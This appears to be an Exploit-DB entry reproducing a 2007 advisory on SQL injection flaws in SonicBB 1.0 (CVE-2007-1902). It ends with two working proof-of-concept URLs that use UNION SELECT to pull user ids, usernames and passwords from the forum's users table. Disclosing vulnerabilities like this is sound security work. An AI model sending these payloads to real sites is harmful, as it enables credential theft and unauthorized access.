SonicBB 1.0 - Multiple SQL Injections

Author: Jesper Jurcenoks
type: webapps
platform: php
port: 
date_added: 2007-05-14  
date_updated: 2013-12-05  
verified: 1  
codes: CVE-2007-1902;OSVDB-33907  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 30035.txt  
source: https://www.securityfocus.com/bid/23964/info

SonicBB is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

SonicBB 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/

http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23